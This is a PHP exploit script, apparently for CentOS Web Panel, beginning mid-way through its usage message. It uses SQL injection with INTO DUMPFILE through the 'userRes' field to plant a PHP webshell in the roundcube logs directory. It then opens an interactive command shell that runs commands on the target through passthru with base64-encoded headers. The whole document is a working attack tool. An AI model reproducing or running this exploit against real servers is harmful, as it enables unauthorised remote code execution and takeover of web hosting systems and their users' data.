\n"; print "\nExample....: php $argv[0] 127.0.0.1 egix"; print "\nExample....: php $argv[0] cwp.victim.com bob\n\n"; die(); } function hex_enc($input) { for ($i = 0; $i < strlen($input); $i++) $encoded .= sprintf("%02x", ord($input[$i])); return "0x{$encoded}"; } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2083/{$argv[2]}/"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); //curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080"); print "\n[+] Injecting PHP webshell\n"; $sh_fname = uniqid() . ".php"; $phpshell = hex_enc(""); $injection = "\" UNION SELECT 1,{$phpshell},3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE \"/usr/local/cwpsrv/var/services/roundcube/logs/{$sh_fname}\"#"; curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["userRes" => $injection])); curl_exec($ch); print "[+] Executing PHP webshell\n"; $phpcode = "print '___CMD___'; passthru(base64_decode('%s')); print '___CMD___';"; curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2031/roundcube/logs/{$sh_fname}"); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\ncwp-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]); preg_match("/___CMD___(.*)___CMD___/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }